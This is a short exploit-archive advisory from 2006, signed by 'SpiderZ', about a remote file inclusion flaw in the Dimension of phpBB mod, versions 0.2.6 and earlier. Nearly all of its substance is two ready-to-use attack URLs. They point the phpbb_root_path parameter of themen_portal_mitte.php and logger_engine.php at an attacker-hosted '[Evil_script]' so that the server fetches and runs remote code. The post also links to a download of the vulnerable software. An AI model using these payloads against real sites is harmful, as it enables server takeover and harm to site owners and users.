Dimension of phpBB <= 0.2.6 (phpbb_root_path) Remote File Includes

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Dimension of phpBB <= 0.2.6 (phpbb_root_path) Remote File Includes
# Published : 2006-10-05
# Author : SpiderZ
# Previous Title : phpBB Security Suite Mod 1.0.0 (logger_engine.php) Remote File Include
# Next Title : phpBB Admin Topic Action Logging Mod <= 0.94b File Include Vuln

_________________________________________________________________________


           /      
            ,,  /  /
         '-.`()/`.-'
        .--_'(  )'_--.
       / /` /`""` `            * SpiderZ Hacking Security *
        |  |  ><  |  |
                /  /
            '.__.'


# Author: SpiderZ
# Dimension of phpBB Remote File Inclusion Vulnerability
# For: Dimension of phpBB 0.2.5 (phpBB 2.0.21)
# Site: www.spiderz.altervista.org
# Site02: www.spiderz.netsons.org
_________________________________________________________________________


# Remote File Inclusion

http://site.com/[path]/includes/themen_portal_mitte.php?phpbb_root_path=http://[Evil_script]

http://site.com/[path]/includes/logger_engine.php?phpbb_root_path=http://[Evil_script]


------------------------------------------------------------------------------

# Download: http://www.phpbb-dimension.de/dload.php?action=category&cat_id=16

------------------------------------------------------------------------------

# www.Syue.com [2006-10-05]